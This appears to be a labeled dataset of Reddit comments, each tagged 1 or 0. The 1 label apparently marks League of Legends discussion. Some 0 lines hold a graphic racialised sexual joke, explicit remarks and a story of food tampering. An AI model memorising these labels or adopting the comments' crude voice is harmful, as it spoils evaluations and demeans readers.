1	A few points:   1) Why?  Supports got huge buffs last season with all the new support gold items that already allow them to itemize depending on what type of support they want to be.  These items seem unnecessary in that regard.   2) Teamwork in Vision.  With items the way they currently are, there is a constant need for teamwork in establishing and maintaining vision control.  If your ideas here were to go through supports would be almost definitely expected to rush the sightstone which gives them 5 max wards, and once again expected to be in charge of warding the entire map.  One of the reasons behind last season's vision changes was to remove that and these changes would directly conflict with that.     Gold Income and Itemizaton.  Before the gold changes last season, supports were expected (and basically forced) to spend the majority of their income on sightstone and vision.  Now the team contributes and supports are able to buy actual items and do much more for their team.  These changes would force supports to basically  use their first 2k gold (instead of 800 in live) on vision and would delay most of their normal items.
0	I love how the first part of the thing you link literally says: "most people who think they have an eidetic memory, don't, they just have good memories." Having an actual eidetic memory is very rare/exceptionally unique and are all somewhat sketchy.   Remembering conversations people had when you are 'dead drunk,' is the worst example ever. Mainly for the fact that you have no idea whether you have remembered it perfectly or not. The only thing confirming your memory is your  own  memory. The evidence is being used to prove itself.   The memory will seem super clear, but that doesn't mean it is accurate. Moreover, theoretical eidetic memories are people that can remember everything ever said or done near them.
0	when i walked in my bedroom home early from work. one black guy had a fist in her cunt, the other had his dick shoved so far down her throat that I saw it in her throat.   That's when I was like, this probably isn't going to work.
0	My favourite occurrence of this is when I was driving my girlfriends car which is only a little 1.0 litre Volkswagen Up.   I pulled off the motorway still doing around 75mph on the first part of the slip road, and an Audi S5 flew past me. Must have been doing 90+.   He hits the lights at the bottom, comes to a stop, edges forward a few feet (I'm still coming down the slip road at this point.) After having gone too far forward he stops, and I can see from the exhausts and slight rattling of the car he's revving it for the quick pull away.   The thing he's failed to notice is that past this set of traffic lights is another set. And past that set of traffic lights is another set. And they're all on red.   However I know that when the lights to the right of our road turn red for the other traffic, there is around a 1 second gap before ours turn green. I also know that if I hold it steady at 40mph going through the first set. The lights at the next set will turn green before I reach them.   I also know that I can then increase my speed to 50mph and the next set will change just before I reach them.   You can probably guess what happens next.   I coast through the first set in the 2nd lane next to him. He floors it. Reaches the 2nd set of lights before me. They're still on red. He comes to a stop. I proceed through that set and pass him at 40mph. He floors it. Up my speed to 50mph. He reaches the final set of traffic lights and stops. I reach the lights as they change and overtake him. He floors it. The lanes narrow down from 1 to 2 with me in front.   [Mfw when he flashes his lights at me like I cut him up.](
1	Yes, it is possible, but the idea is different than if you're just simply carrying yourself.  You're goal is instead to feed your ADC, and have him do the damage, while you protect him.  Supports can carry, but it is a little more difficult, because you have to have the ADC be somewhat near the same page as you.   If you're way above your current elo (I mean truly, not just because you THINK you are.) you can just force feed your ADC and zone out the enemy and just win because their ADC has almost no farm and multiple deaths.   There are always games where you can't win, it's nothing terrible, happens everywhere, doesn't have to be any ONE persons fault, but expecting to constantly win games at 100% win ratio is almost impossible.
0	I had a professor tell the class that he put marks on the floor and assigned grades based on how far the paper flew.  Then he laughed like he was joking.   I stood up and said "you're not joking! That's like when I was 16 I would tell my mom I was sitting on the beach smoking pot with a hot blonde and then we would both laugh because that's and absurd thing to tell your mom."   He looked like he just got caught with his hand in someone's pocket and wouldn't respond to any questions the rest of the class.
0	Last I heard, I think she married the guy.   oh this reminds me of the part I left out of my own woeful tale.  She dumped me for this guy, and about three weeks later I checked her facebook (something I'm proud to say I've discontinued) and saw that they were engaged.  Crushing?  Not nearly as much as this next part:  facebook lets you set the date of the engagement.  It was set ten days before she dumped me.  Nice little added fuck you, I guess.   You have my sympathies, and I appreciate your having posted this.  Pain shared is pain lessened, I think they say?  Hope you're doing okay.  This whole thing might be the single most difficult thing I've ever had to get through;  I lost all my (our, or rather, her) friends, and am basically agoraphobic by default now due to fear of running into her.  We shared a lot of similar interests, unfortunately.  She got to keep those, too.
1	I don't think that Cinderhulk is the problem, its that due to teams opting into a lane swap in 95% of every game. And in a lane swap the top laner gets starved for the first 10-15 minutes of the game, sometimes so badly that they have less gold than supports do. Pro teams have resorted to double jungling because its the only place the top laner can go in order to not risk getting tower dove for first blood and pretty much the only way that they can get any gold. I don't think it should be a huge surprise that top laners finally just said "screw it if I'm going to be sitting in the jungle following my jungler around until the mid game I might as well just take smite and jungle myself". Getting an extra +30gold on camp clear and being able to clear camps or even the scuttle crab by themselves makes them a whole hell of a lot more relevant and I'd wager probably gives them an extra 500-1000 gold over what they would normally be getting due to not taking smite.   Overall I think pro teams have forgotten why they lane swapped originally. You originally lane swapped if you picked a poor laning adc and you would let your adc get a few levels to where they could start laning a little more safely and then swap back. Now top laners are largely irrelevant until 30-40+ minutes in the game if at all.   The lane swapping has gotten ridiculous,  the fact that laners are taking smite over flash to try and get some semblance of gold is proof of that. On top of that nobody even likes lane swaps. Pro top lane and adc players have even said they hate lane swapping but only do it because they have to. The fans definitely don't like watching lane swaps, we like watching the test of skill 1v1/2v2 of the laners with occasional jungle interference. Riot has been letting lane swaps exist for the last 3 seasons now but lane swaps are now starting to get more and more toxic to the game.
1	Swain is a toxic piece pf shit to lane against. Never won lane against him without the help of the jungler, and probably never will. Especially in toplane, against melees. Want ti cs? Here, have a targeted DoT that takes a quarter of your HP bar. Low on mana? Oh, just let me lasthit a few minions and its cool. Low on health? Let me just turn on my ult THATS ON A 8 SECOND COOLDOWN. And dont tell me he is easy to beat pre 6, because if you try to all in that fucker he'll just slow you, snare you and kill you. Then he goes fucking b and buys his catalyst and the lane is over.
0	Okay so I went to highschool with this guy. And we became good buddies. Me, him and some of our other friends would hang out (and still do). But after I started hanging out with him more and going to his house. I realized how fucked up he is. But now we have a group of friends and he just won't leave. He'll invite himself or someone else will invite him. I guess I still call him my friend because he has actually done SOME (very little) good and I've known him for quite a while now.
0	Comcast is really terrible as someone that worked for a call center doing support for Comcast, the objective, as any call center was to process calls as fast as possible, not actually help the customer, so the "best" people at the center would say all the key words in their call and just enough "support", til the customer phoned back angry and I got them and I had to deal with the customer's understandable rage and a super long call that actually resolved all their issues.  Maybe this belongs in /r/callcenterstories
1	thanks guys.  ya i dont really like ali as support either, but we needed a support and he was all i had atm.  (i immediately bought soraka and janna)  ive looked at builds, and after reading what you guys said the skill order of q over the heal makes sense.  the heal isnt all that great, but the increase of cc from lvling q is great.   the whole cait=poke makes sense too.  she doesnt have anything to burst with.
0	Depends on the shape but in general I think trimmed bush is neat, makes you look like a grown up woman -which is a turn on for me. In my head it's a sign for "bang me like one".
1	OP is pretending that EU fans are so sensitive that they can't handle TSM trashtalking them.   What's actually happening is that TSM thrashtalked EU, it blew up in their face, so now EU is thrashtalking TSM back and TSM is crying about it. EU handled TSM thrashtalk just fine (nobody cried about TSM's "Fnatic will crash and burn" pre-MSI); it's TSM fans who are bitchy and whiny because they're getting some revenge thrashtalk.
0	In case you're genuinely curious, here's the deal:   If you're native, living in the U.S., today, your odds of a "good life" by almost any measure are worse than those of basically everybody else in the country.  That's not random, and it's not the past--it's present-day reality, the ongoing effect of a devastating history that's  still in process .   Displacement, devastation of the Etruscans and Minoans?  Fascinating, sad in its way, but  not present today .   Disenfranchisement of native peoples in the Americas (and Australia)? In effect, STILL FUCKING HAPPENING.   That's why this matters so much.  We're talking about the real lives of real people who are actually living right now, lives that can be improved if all of us acknowledge not only what happened but also how the harms of the past have structured the conditions of the present.  When we acknowledge that, we make new treaties possible.   As it stands, the United States is in effect a colonial power with regard to native populations.  Alongside the things others on here have mentioned, there's the legal fact that native American tribes are recognized as domestic dependent nations--that is, as autonomous nations that, in their autonomy, are "dependent," are vassal states of the United States and that, unusually for vassal states, happen to be located within the territory of the U.S. itself.   The U.S. government's relations with the various Indian nations are still ordered by a tangled mass of old treaty law: not by the Constitution and not, for the most part, by new treaties, written and agreed to in a spirit of fairness.   Again,  all this is present-day reality .  Show me something even remotely similar in the case of the Celts or the Etruscans or any other ancient people (in Europe, maybe the Roma come closest, though that's still a pretty different situation), and I'll weep for them. The real point, though, is what the honesty of weeping makes possible--and that's new ways of organizing relations between the sovereign state and what are currently its deeply maltreated internal colonies.
1	I was with you for the soraka to, but you lost me at jungle and AD malz...   If I was in my promo and someone decided AD malz was a good idea I'd be pretty pissed. It may work for you in low elo, but you will get picked apart by a decent enemy team. You need to expand your champion pool bro. There's a reason these picks are uncommon/seen as troll, and it isn't because you are just on the cutting edge...
1	This is a great idea. I just moved out to westheimer. Not only would I try to get tickets for this given the limited availability I'm sure, but I was unaware of OP's place of work. Sounds like a cool place and some of the events sound really fun... TMNT pizza party  cough  even if I couldn't make it to the league event I would like to check out other events there.
0	I've had the worse sort of issues with Pizza Hut. I ordered a pizza online, was happy, yay. After an hour goes by and no pizza has arrived, I call the store to see what's up. The girl on the phone looks up my order and then says, "Oh. We don't deliver to that area." I attempt to keep my cool as I ask her why their website would allow me to order my pizza as a delivery if that was the case, to which her response was, "I don't know." I then asked her when they were planning to call me to let me know my pizza wasn't coming. All she could offer me was a, "It's done now if you want to pick it up?" I angrily go to the location to pick up the pizza because I'm starving and don't care at this point. When the guy behind the counter hands me the pizza, he says, "That'll be $17." Apparently because the actual delivery order online couldn't be completed, they cancelled it, and thereby cancelled the payment on my debit card. Silly, angry me forgot my debit card at home on my computer desk because I was in such a hurry to gtfo and get my pizza. All I had in my wallet was a hundred dollar bill which they wouldn't accept. I had to run across the street to a gas station to make change for my cold pizza which I paid full price for. He didn't say thank you.
1	They did compensate for instability. That has already occurred.   Also there is very little ground to suggest you deserve compensation for not being able to play for 5 days. This would be true would be if you were paying a subscription - then you are losing out on the service you are paying for. At this point you are unable to smoothly play a game you play FOR FREE. If your account had been lost or if the content which you had paid for had been removed from your account, then you would perhaps deserve compensation because then Riot is screwing up something you have paid for. You want to be paid on top of the courtesy IP you received because that game you pay nothing to play isn't running well.
0	This happened to me last year and I knocked on the door of my friend's apartment and she didn't respond so I texted her and still got nothing.  It wasn't until her roommate showed up with the drinks asking why I didn't just call my friend, so I told her I got no response.  It wasn't until her roommate called her that we found out she was a little preoccupied with a special guest.  Needless to say it made the rest of the night a little odd.
1	One of the difficulties of translation is capturing cultural nuance and meaning behind the words used and appropriately interpreting that nuance in a similar scope in the context on a completely different culture. The pressure of translating live is that when you have to remember what you heard, reinterpreting that that sentence in the cognitive orientation of one society's world view into a completely separate one is hard to do on the fly - and the difficulty can get amplified if linguistic structure one one language is alien to another. Simple sentences can be easy - but colloquial mannerisms not so much.   On top of that, if you throw in the possibility that some words or concepts may exist in one language that do not exist in another, then things can get messy.   The translation may not necessarily have been  wrong , it was simply  said wrong .
1	AT the same time, I am no where near high ELO, but I would like to believe that people in 15/1600s know not to 1v2 two full health fed enemies. Or three.  Our Ryze did just that. We called him out on it the 1st time, but the 2nd and 3rd time he did it anyway. He wasn't 0/46/0 BoM Phantom Dancer Master Yi, but couldn't this be considered intentionally feeding? The two enemies were in plain view, and no one on our team was around. No one told him to back because we assumed he had the common sense not to fight 2 fed enemies by himself.
0	Yes, people lie, some better than others, but ultimately living your life suspicious and not trusting your spouse and torturing yourself with the unknown is no way to live   I never said place all your faith in her words, but you certainly shouldn't ignore everything she has to say, I literally said you should listen to what she says AS WELL AS other strange behavior   I'm not sure why you have to be so mad. You assume because of one slightly irregular event that OPs wife is dishonest and untrustworthy. You powers of perceptions are astounding.   This is supposed to be your life partner, if you can't put any trust in what this person says you shouldn't have married her in the first place
1	Just retards circlejerking and blowing things out of proportion. Doublelift acts the way he does because it creates hype and generates more views and popularity for the players. Idiotic fans don't realize this and think players are being 100% dead serious when trash-talking, so they get defensive.
1	I main two positions, Support and Mid; and I play quite specifically one  distinct  type of Champion.   My go to Mid is Ziggs, mostly because of his amazing harass and ability to annoy enemy laners; his farming is superb and can rack up impressive CS even when he's being pushed out of lane. What sticks out with Ziggs to me is his great team fight presence and AOE, but more specifically his disengage.   For support I use Lulu, I highly enjoy her harass and extremely potent disengage and engage prowess.   Now here is the trend between all of the champs I like to play. I really enjoy crowd control, and I shape my play style around it. I play by annoying the enemy laner to the extent they try to kill me, and they can't.   Now here is my question: I suck at ADC, and it's because of my play style. What is an ADC that fits my style?
1	I've said this before, but let me explain something to you. Kara is more of an admin when it comes to the NESL, and if it was up to her she wouldn't cast. When makeup games get put together, and no one is available to cast them, she steps up and will cast them. Really, what she is doing, is saving our butt's when these makeup games.
1	I originally thought it stemmed from Fabbyyy the Gatekeeper. But now I'm thinking it may have something to do with splitpushing and backdooring their inhibs to flood their base with super minions, i.e. opening the gates for the super minions.
1	So I ran some calculations on the cassio changes to compare the new damage numbers to the old.  I ran a calculation of what I would call an all in burst combo and a basic damage combo.  The burst combo consists of 1 q, 3 seconds of w, 3 es, and 1 r, while the basic combo is just a q and 3 es.   The simplifications of the equations for the new and old totals are below, where AP is pre-passive ability power with the passive being worked into the total ratios: Old Burst: 1450 + 3.5 x AP Old Basic: 805 + 2.45 x AP   New Burst(375 Stacks): 1115 + 3.835 x AP New Basic(375 Stacks): 675 + 2.79 x AP   New Burst(0 Stacks): 1115 + 2.95 x AP New Basic(0 Stacks): 675 + 2.15 x AP   New Burst(374 Stacks): 1115 + 3.39 x AP New Basic(374 Stacks): 675 + 2.47 x AP   A comparison of the new end game cassio equations to the old yields a required AP total of 1000 pre-passive to match the burst combo and 383 to match the basic combo. Without full stacks (0-374 stacks) both values will always be lower for new cassio.   From these results we see that new cassio will generally be dealing less damage through most portions of the game and the only damage buff would be to a late game basic combo, which for reference is <100 damage at 650 pre-passive AP, so it is almost negligible.  As a result, the changes cassio can be looked at as she is trading damage and a strongish early game for some extra utility late.  Of the utility improvements the most notable are a much lower effective ult cooldown and the free lifesteal effect on the e which late game gives ~ 100 hp per e, which is pretty cool. Some other things to note are that the adjusted cds on q and w mean the cooldowns will be about the same as before with a .2 s shorter q and a 1.5 longer w cd, and the changes drastically cut her base damages meaning a penetration/tankier build will be a lot weaker.  The removal of her old passive also means that she will face a lot more mana problems in an extended fight.  Overall I see the changes as poor as they weaken what was an effective early game to improve utility late, but not in a way that helps her with her biggest problem late game, an extreme weakness to burst damage, which the itemization restrictions will only exacerbate.
1	People can be dicks, just live with it' is basically the paraphrasing of a teacher who doesn't want to do anything about bullying. Toxicity in the form of people a) throwing the game deliberately in response to some (perceived) slight or b) abusing other people is bad sportsmanship, bad for the community and bad for outsiders' perceptions of LoL.   You may not find it that bad, but being called a 'f*g' or a 'n*gger' or a  'c*nt' becomes rather grating after the fiftieth or sixtieth time — I play this game for fun, and I don't want to have to put up with that. Even worse, in a team game it's not conducive to team play — are you really inclined to help or  trust  a player that's been abusive all game?
1	The reason why they are able to split push is because you are allowing them to never engage in a fight. The only way split pushing works is if time was stalled for the split pushers. They have an awful disengage team, so if you guys had ascension on Lulu, and just had warwick lock down quinn/ahri, you guys could had simply pushed mid and ended it.   The goal of the split pushers is try to equalize objectives and avoid team fights. Jax and Udyr are amazing split pushers, but I would argue they don't have the same level of power in team fights.
0	Yes, men who have been friendzoned need to move on already.  It's the best thing you can do.   Take it from me.  I got friendzoned once, and I decided "fuck this shit", I wasn't gonna take it anymore.  I thought I was gonna be 100% boss and show that bitch what was up!  I invited her over to my place, made her a classy fucking dinner, and by the end of the night went in for the kiss and got it.  I was out of the friendzone for two weeks until she said she wanted to go for a drive.  We went to the parking lot of a local take out joint, and we talked.  This is where she told me she didn't like where things were going and that we made such better friends.   That's right, I crawled out of the friendzone, and she put me right back into it.  Things were never the same, and I soon realized that I had to move on with my life.   Three months after that I met another girl.   I hit it off with this girl, and now almost 10 years later, we're happily married, and we got a kid on the way.  I look back and think about what I was grasping at with that other girl, and I think to myself that all I was really looking for was the convenient option that was in front of me instead of putting in the effort and looking elsewhere.  In the end I realized that girl was a shallow bitch anyways.  Best decision I could have made in my life was manning up and cutting that dead weight from my life.
1	Some months ago I played in a qualifier for one of the bigger 'local' tournaments organised so far. The team we played against had a full AD / bruiser team composition (I think they even had J4 support, but I'm pretty hazy on all the details anyway). Some bans were targeted against us and picks counters for what we usually picked, so we were grasping at straws every time it was our turn to pick a champ.   One of us jokingly remarked "they are all AD, we should pick Rammus" and then it dawned on us that he's actually a good choice all things considered. We couldn't squeeze him into the jungle since our jungler wasn't confident in his Rammus skills so our top laner (who used to be our jungler in S2) picked him top lane against Zed.   He then proceeded to absolutely  demolish  Zed in lane.   We couldn't stop laughing. It was actually unbelievable. Every time he forced Zed to go back or killed him, he'd just powerball over to mid and secure a kill by taunting their mid laner. He was virtually untouchable throughout the match and definitely carried us to victory.
1	So as already figured out, it does proc multiple times.   I main shyvana, and she benefits greatly from attack speed. Her q gets cooldowns per attack, her e does magic damage per attack and her ult cooldown is decreased if she autoattacks. This fact is even made more significant because her q resets the autoattack timer, and applies 2 autoattacks, so you can proc wriggles, ionic spark and wit's end at once. Therefore, on-hit effect are very nice to have on her, and so far, I get a wit's end every game. Because of the effect, ionic spark would increase her AOE even when not in ult form, and increase her overall effectiveness. On top of that, it grants some health for a little bit more tankiness.   However, shyvana gains earlygame health by buying phage, which is really a necessary item because you don't always have red buff. You don't need the health of the spark (randuins/mallet provide enough). The spark proc damage (110 magic dmg) is not really much and falls off lategame. Wit's end is a decent item too, but it is valuable all the way to absolutely lategame due to the magic resist it provides. Plus, it procs damage on every basic attack, which 1v1 would be the same or more than spark. On top of that, shyvana does not need more AOE than she already has. Jungle camps get cleared insanely fast already.   Also, you want to jump into the enemy team with your IM A DRAGON ultimate. You want more health, armour and MR to survive that. If you want to go DPS and counterjungling-style (when you are facerolling), I would get a zeal and build it into trinity force, then randuins -> atma's -> some HP item (warmogs?)
1	Take a break, try out some new champs. I'm not ashamed to say that Darius jungle brought me out of a huge LoL slump.   I've also started to change my outlook on the game. I think one of the biggest problems facing a team in soloque is a lack of communication and leadership. People may know what needs to be done but don't have the communication or leadership skills to say anything but "OMG BOT STOP FEEDING"   I try to take on the roll of leader. First rule of mine is to never, ever refer to myself as some kind of authority. Most of what I do is type "GJ  __ " whenever I see a good play or "It's all right guys we still got this" if someone dies. If someone starts flaming bot for feeding or jungle for never ganking top I try to be the voice of reason.   It's made a huge difference in my games. I'm not perfect and there is still the odd game where someone trolling frustrates me. Most of the time though flamers and trolls just don't effect me. I'm going to lose around half my games, managing trolls and frustrated people is just a reality of Soloque.   What server are you on? Our ELO's have been around the same areas (I was once around 1k and I'm on the rise now. Although I have avoided ranked in favor of normals while I learn new champs). I don't tend to view ELO as something to be gained or lost. I practice my skills in normals for many games and hop into ranked to see how I compare to myself from the past.   If you're in NA I wouldn't mind Duoing a bit.
0	Well if someone uses your brand name and a) is poorly run or damaging to the brand, or b) off message, for example raising money for a different issue - then yeah it would make sense to try and shut that down. They can open back up with another name. You want to control your brand and image.   Going after someone very small however can just make you look like a jerk and tarnish your brand anyway. Defense requires a sound strategy, and  my guess is that they haven't (or hadn't) quite figured it out. (Ex. "We'll go after EVERY infringement we find to send a message not to use our brand" ...well message received, but probably not the one you wanted).
0	apparently, I stood by silently while my inlaws attempted to put together a pack-and-play that was loaned to us. they fussed and muttered over it for about 5-10 minutes trying to get it pop-up and stay up, but it just kept falling down.   I said, how about this lets read that big block of text at the bottom of the thing that looks like instructions. shockingly less than a minute later it was setup.   it's not just men. it's just some people.
0	See, this scenario is what I'm afraid of. We found a cat a few months ago, and since it looked well taken care of, had a collar, and came right up to us and wouldn't leave our side, we had assumed it was an indoor cat that had gotten out. So we called the shelter, posted signs, check to see if he was chipped, lit up the Internet, etc. and still no one claimed him. We are still always worried that he is actually an outdoor cat that we 'took' because he loves being outside and is not declawed. That being said, he is also not neutered (which I would assume would be something you do if you had a cat that roamed the neighborhood) and he is not fast at all. I would feel awful if I took someone's beloved pet, but then again, if they loved him they would have chipped him or at least put some information on his collar. Anyway he is awesome and is mine now, the end.
1	Yes, the support gets the shaft on things. Let's now look at the jungler. We are expected to keep up in levels and gold, gank the lanes, ward, secure objectives and die for the greater good of the team. We have to not only compete with the enemy jungler stealing our jungle but our own team. I love being the jungler and the mid going to take my wraiths before 6-7 minutes. Then I go in and gank, red buff might take the kill and then I get yelled at for stealing it. Then the lanes are pushed to tower and warded, so I am unable to gank. My lanes are taking the jungle farm and I can't gank anything.
0	I recently switched to an Engineering major for my sophomore after falling out of Nursing my freshman year, thanks to my failing grades in Biology. I thought I had conquered the hurdles of biology-related classes after kicking ass in Physiology, but then I realized "nope, they're different" and decided it was probably a good idea to just take a major that focused more on math-based sciences.   While I already took Calculus I in high school, a year without a single math class didn't help with remembering any of it so I'm retaking Calculus. The class is now piss easy, since every lecture is just making me remember everything nearly instantly and then I just doodle on my notes.   Naturally, there are students who are struggling to understand how to do things in this class; that does not surprise me. Usually this involves asking the professor how she did a certain step in the calculations during the explanation of example problems. Here's the problem though: those parts that get them confused are incredibly basic algebra. Maybe even pre-algebra or, dare I say, basic arithmetic. I am not kidding.   Just yesterday, while going over the mean value theorem, two students got confused how we went from 6x=0 to x=0 (specifically asking where the 6 went). My professor joked about how she "just ate the 6" which highly amused me, but the students were still lost. It took them a good 45 seconds or so to finally realize the magic.   Yeah, sure, my professor could have explained it better, but I really don't think something like that deserves any kind of explanation at all in a damn Calculus class. Weren't you supposed to take a placement exam to see if you could get into this class in the first place?   That's the worst so far, though. I would mention some other instances, but they're not recent enough for me to remember, nor do I care enough to remember such stupidity.
0	A man should learn to detect and watch that gleam of light which flashes across his mind from within, more than the lustre of the firmament of bards and sages. Yet he dismisses without notice his thought, because it is his. In every work of genius we recognize our own rejected thoughts: they come back to us with a certain alienated majesty." - Ralph Waldo Emerson
1	You could make the same argument about Soraka heal, or Karthus ult after his death, or ...   I played denyplank several times and you could push my tower easily.  With the new 2v1 meta you would just dive denyplank since he's got no creeps anyways.
0	I applaud this, but would still recommend managing your expectation. Think of what you're giving as a steak dinner. It's freaking delicious and certainly satisfies hunger, but sometimes we just want a snack and there's no one around to cook the steak, so we grab a burrito from Taco Bell or snack on some potato chips. It's not healthy, and it's nowhere near as good as the steak, but it's manufactured to be loaded with stuff that tastes delicious and makes us full. that's what porn is; it's manufactured to hit all the sexual sweet spots a guy may have, but it's not a nutritious balanced meal. it serves an immediate need, makes you feel a little guilty after you're all done, but is always there when you need it.
0	Hehe I replied to a similar statement earlier below. I was replying to Zaku's story of the vet (not our gamer friend who I am sure adjusted his behavior and felt bad afterwards, because who wouldn't) who said it was their problem to deal with, not ours (me not being a vet). My reply was that it is our problem, because most people will not continue an action they realize is unintentionally causing emotionally disturbance to a friend, family member, or really anyone in general.   In Summary (
0	I asked out a girl when I was in high school, might have been the start of my sophomore year. I thought she was so cool, so much different from all the other girls I knew, ect. I really did think I found one person who I could spend all my time with. I eventually asked her out and she said no. The worst part of rejection isn't the rejection, it's the time after. She didn't really talk to me and it made me feel awful. We eventually got close again as friends, but there was always an awkwardness and a standoffishness coming from her. But we were friends. When she went to college she had no friends and would call me crying, saying she missed me and needed me. Once she said she loved me. This Finally made me feel like I had a place in her life like I had always wanted. But once she found a group of friends the calls stopped coming, the texts stopped coming, and she alienated me and never made me feel comfortable around her again. Girls are weird man. But now I'm in a great relationship where the feelings are mutual
1	SOPA is a bit of a complex bill running through US Lawmakers and is explained sufficiently [in this video by TotalBiscuit](   GoDaddy recently said in a statement (I believe an official statement, not just some random tweet written by a "PR Proffesional) That basically even if SOPA is bad supporting it wont hurt their business, and they believe(d) that if it went through it would help their business.   Cue internet shitstorm as everyone wanted to prove them wrong; that supporting a bill as restrictive and evil as SOPA  would  in fact hurt their business as dozens of internet celebs and big-boys withdraw their sites from GoDaddy and move them to other providers, even at higher cost, simply because of their support of SOPA.   GoDaddy tries to cover face and do a complete 180 on their stance of SOPA, but the damage is already done, and I don't think many people want to go back to a company that both backed a terrible piece of legislation and then decides to just flip-flop when called out on it.
1	With 560 data points you get a 95% confidence interval with less than 2% of spread. So his true winrate is almost certainly within 38%-42%. Compared to his pre-patch winrate of 43%, that's almost certainly a decrease.
1	i usually just listen to my favorite music, like pumped up music, and just take the games as practice, to make myself better, if i'm good at laning, i wanna get good at map awareness, or warding, or looking at what my team is doing while csing, maybe you can help your team not feed by paying attention to them as well. multi task is hard but it can help. IF you look to win every game, you will just get mad easy.
1	Just because someone starts being toxic doesn't mean you need to bash them. It's a lot more likely you'll get reported for verbal abuse if you try to take it out on him, and honestly? He/she isn't worth a time ban on your own account, just because you're frustrated. Better to mute him, play the game out, report him at the end, and move on.
0	Coming from a Public Health perspective, this is a  MUCH  larger issue than stated.   First off, people on government assistance continue to have more children because they are incentivized upon having more children. Typical cash transfer programs are designed in such a way that if you are a family making less than X dollars per year you are entitled to X amount of money. If you have a child under X age you are entitled to more, if you have 2 children you are entitled to even more, and so on..   Having worked in social work for a number of years as well I have also come across (first hand mind you) people who have actually stated that they were planning on having their 4th child because Obama will give them more money. I am not stating opinion here, just verbatim of what was said. Whether or not it's "kosher" to think people can be shitheads, this thought process is not uncommon.   The trouble is that by providing more money you are not solving anything, but merely creating a larger problem. Many of the times the money is not going towards the childrens health, nutrition, housing, or education, but rather parental vices like clothes, cigarettes, alcohol, and drugs.   This is where alternate programs like "Conditional Cash Tranfer" programs come into play. If you do a little research on the subject you will see that they work 10-fold in Mexico and other poorer countries. The idea of CCT programs is that one is awarded monetary compensation based upon meeting obligations put in place by the government itself. These obligations are put in place to ensure the welfare of the child first and foremost and to make sure the funds are being used appropriately.   An example of this would be that a family would be given X amount of dollars per week as long as their child has been to school every day, all members of the family are up to date on their vaccinations or yearly physicals, etc.   CCT is simply an off-shoot of Contingency Management, Behavioral Economics, and basic Operant Conditioning (cite Skinner). It's been proven effective several times over and I cannot begin to understand why we do not adopt this type of program here in the U.S. Former Mayor Bloomberg has started one in NYC, but I am unsure about the outcome data regarding it.   Going back to your comment above specifically, you also have to take into account that people are not rational thinkers. People like to believe in mystics and jesus and the golden walnut and allow things like that to cloud their better judgement. Providing teens with birth control and sex education has proven effective several times over through countless randomized trials when compared to abstinence. Still, people hold on to their old testament ways and still consider it "sinful".   Second, providing highly effective and long-term birth control options for free is questionable. First off, nothing is free. It would be a challenge to get insurance, or tax payers to cough up more money to pay for people to continue fucking who shouldn't be in the first place (joking of course). Next, many IUD's or BC methods have some unknown or severe consequences. If this was to be distributed by the government they would then bare the brunt of responsibility if one reacted negatively towards that specific medication. I could be wrong about this. Next, would options would be included in the "free" package? Their are thousands of BC methods and you know one would get the contract over the other....whomever bought off the most legislators I am sure. This means that the most money wins and not necessarily the best/safest product.   My last point, is that this is  VERY  multi-faceted. It's an educational problem, it's a environmental problem, it's a societal problem, it's an individual problem, it's a community problem, it's a familial problem. Because of this, there isn't a simple solution or magic intervention that put in place would solve the issue.   Individually, people need to begin to take responsibility for their actions. By throwing more money at them for no effort in return they are not learning and thus destined to continue their pattern of destructive behavior. Familial level, people might know nothing else. Their parents were on welfare and it's all they know. No one gave them aspirations to go to college and no one cared either way whether they worked or not. This is a learned behavior and is hard to change.   Environmentally, maybe that person lives in a neighborhood or project where everyone around them is on government assistance as well. That person then learns this is something acceptable within their community and actually forms bonds based on it. It's no longer viewed negatively. They also learn how to game the system and how to get the most for your (lack of) buck. i.e. having more children nets you more income.   Societal level, we allow it, don't want to deal with the problem, and think by simply providing money that will somehow solve the problem. People like to  believe  they are being altruistic by supporting certain causes vocally, but never actually think about the consequences of those programs, who's affected, or what goes into them. These are the same people who claim to be altruistic, but have never seen the inside of a soup kitchen to volunteer their time in their lives. - posers.
1	lets look at a flip side, some incredibly unstable person got a person who underperformed in his game, and he felt the need to take drastic actions. contacts riot that this guy may be attempting suicide, obtains address and visits said person and inflict bodily harm.
1	For those wondering Rickonix is a member of the Something Awful (SA) forums (a goon if you will). From what I've gathered lurking there every so often Rickonix just kept leaving games (can't remember if it was just trolling, but it soon evolved in to him doing it just to see how long before he got banned) and never got banned for it...eventually acquiring some sort of fame on the LoL thread in the SA forums for this with how ridiculously bad it got. (To clarify how bad it got a EMPLOYEE of Riot posts in this thread where Rickonix is flaunting 450+ leaves with no punishment!)   Rickonix eventually started streaming and soon the leaver system was implemented and he was banned.  After hearing about this the SA forums made that thread asking to "Free Rickonix" and of course added their ridiculous claims.
0	I use to work at a Dairy Queen and I was a cook, a good cook. I wasnt the type of person who would fuck with someone's order. But one night these people come through the drive through just like a minute before close. They ordered 5 meals. I had already shut down the friers and the grill. So.... turned all that shit back on. Threw some fries to soak in some fairly warm oil. And grilled some pretty nasty undercooked burgers. I had a terrible day so I was just fuming at this point. I ended up spitting in a few of their burgers. I never thought I would do that and I feel guilty about it, but I was pissed at these people. The fries that they got were so nasty too, just a slightky warm oily mass of potato stuck together. I am sure they were very dissatisfied with the meal they got. Luckily we locked and closed our doors once they left. They tried to talk to us by knocking on our door, I assume because they wanted a refund for the shit food they got. But we ignorrd them. And finally went home an hour or so later!
0	My parents had just retired when I went in to college (and separated). My mom made some money, but my dad had no income (retired) and he paid for my medical insurance. This made him the "most contributory parent". I worked full time which paid for housing, and all other living expenses. I didnt get aid from dad (beyond the medical ins), but because his annual income was nothing fafsa gave me tuition and a little scratch for books. Got through college with zero debt. I did also go to a inexpensive state school.   Best friends family: he was one of three and they made just enough to be lower middle/upper lower for the area. He got no aid from parents either (and his parents definitely would not be able to help at all). Because his parents worked, he got no aid from fafsa. He certainly would've been more deserving IMO from a assistance programs perspective.
1	Played against a tryn this week the dude could legit 1v3 our team he was so fed to the point he could 1v5 and splitpushed his way to win his team was feeding and we would even win 4v4 but as soon as he shows up we insta loose the fight his final score 27/3
1	You want a solid solution? Make them ALL buy a pink ward near the start of the game (when everyone does their first back) and tell them to pop it somewhere in your jungle to help your jungler and to prevent invades as well as jungle based ganks.   I admit that I don't upgrade trinket until it's the last thing in my inventory, but I make sure to keep a pink on the map that I paid for ALL game and usually leaving it in your jungle will give you vision and since people are too busy running around as well as it being a risky place to clear, it usually just stays up.
